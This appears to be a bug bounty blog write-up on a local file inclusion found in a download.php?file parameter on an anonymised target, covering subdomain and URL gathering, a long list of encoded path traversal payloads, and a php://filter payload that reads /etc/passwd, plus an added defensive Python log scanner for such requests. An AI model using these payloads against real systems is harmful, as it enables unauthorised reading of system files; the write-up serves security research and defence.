Easy LFI

Easy Local File Inclusion Report

Hello Hackers!!

I'm going to share one of my latest & fastest findings.

Let's call it target.com; they run a bug bounty program with the wildcard scope *.target.com.

Tools:

Subdomains Enumeration

In this step it's a golden tip to use multiple tools to gather good results. I like to use Subdomainer.

Subdomainer is an automation tool for gathering domains & subdomains, whether for a single target or multiple targets. Subdomainer uses multiple tools to do the subdomain & domain gathering job in a perfect way; it can take a list of domains / targets, run the whole operation on them and, after finishing the job, save the result in a comprehensible & ordered way.

A simple usage of Subdomainer:

./subdomainer -t target.com -f true

A lot of things come after subdomain gathering; one of them is collecting all URLs from the live hosts and filtering out any interesting parameters or endpoints.

Collect Them All

So in this step I use waybackurls.

Usage of waybackurls: this is really a good tool for bug bounty hunters to fetch all URLs from the Wayback Machine.

cat all_live.txt | waybackurls

Wrapper

Now that we have all the wayback URLs, you can grep them to collect your interesting parameter or endpoint. Usage:

grep -iE "redirect="

But that would take a lot of time and effort. To automate this process we can use the gf tool:

A wrapper around grep to avoid typing common patterns.

cat waybackdata | gf lfi | tee -a lfi.txt

After that we can go and check these endpoints manually.

Luckily, I noticed a very promising endpoint, /download.php?file, and my spidey sense got activated.

After visiting this host I found that this endpoint was for downloading PDF files.

When trying to inject 1 into this parameter, it downloads a file containing this error:

So clearly this function's job is to search for the requested file via this parameter in this path and try to get it.

Without another thought I injected some payloads like this:

..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}

But no luck... I got the same error message.

In spite of that, something was telling me to keep digging into this 🧐

By using Wappalyzer I found that this host is running on PHP, so I used a PHP file wrapper payload:

php://filter/convert.base64-encode/resource=/etc/passwd

php://filter allows a pen tester to include local files and base64-encodes the output, so the file is returned as text rather than executed by the PHP interpreter. Therefore, any base64 output will need to be decoded to reveal the contents.

So let's decode this base64 string:

echo "BASE64_STRING" | base64 -d

And we got our /etc/passwd file decoded.
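As an added example that is not part of the original post, here is a small Python scanner a defender could run over web access logs for this kind of endpoint. It normalizes the encoding variants seen in the payload list above (double URL-encoding such as %255c, raw and encoded backslashes, %2e) before matching, so it shows why grepping for a literal "../" is not enough, and it flags php:// wrapper requests separately. The log lines, IPs and the download.php path are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the original post); the
# request targets mirror the payload shapes the post lists.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /download.php?file=report.pdf HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /download.php?file=..%255c..%255cetc/passwd HTTP/1.1" 200 81',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /download.php?file=%2e%2e%5c%2e%2e%5cwin.ini HTTP/1.1" 200 81',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /download.php?file=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.6 - - [01/Jan/2024:10:00:05 +0000] "GET /download.php?file=invoice..pdf HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9.+-]*://', re.IGNORECASE)

def normalize(value, rounds=3):
    """Percent-decode repeatedly (%255c -> %5c -> backslash) and map
    backslashes to slashes so every encoding variant compares the same way."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def classify(raw_value):
    """Label one file= value: 'stream-wrapper', 'path-traversal' or None."""
    norm = normalize(raw_value)
    if WRAPPER_RE.match(norm):
        return "stream-wrapper"
    # Only a whole '..' path segment counts; 'invoice..pdf' is a benign name.
    if any(segment == ".." for segment in norm.split("/")):
        return "path-traversal"
    return None

def scan(lines, param="file"):
    """Return [(line_no, label, normalized_value)] for suspicious requests."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for value in parse_qs(query).get(param, []):
            label = classify(value)
            if label:
                findings.append((line_no, label, normalize(value)))
    return findings
```

scan(SAMPLE_LOG) flags lines 2, 3 and 4 and leaves the two legitimate downloads alone.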

EXTRA

Although these tools and techniques are few, there is a lot that can be done with them. You can use multiple Gf-Patterns to find:

  • xss

  • ssrf

  • idor

  • ssti

  • open redirect

  • etc

A great place to find more LFI bypass tricks:

Thanks For Reading
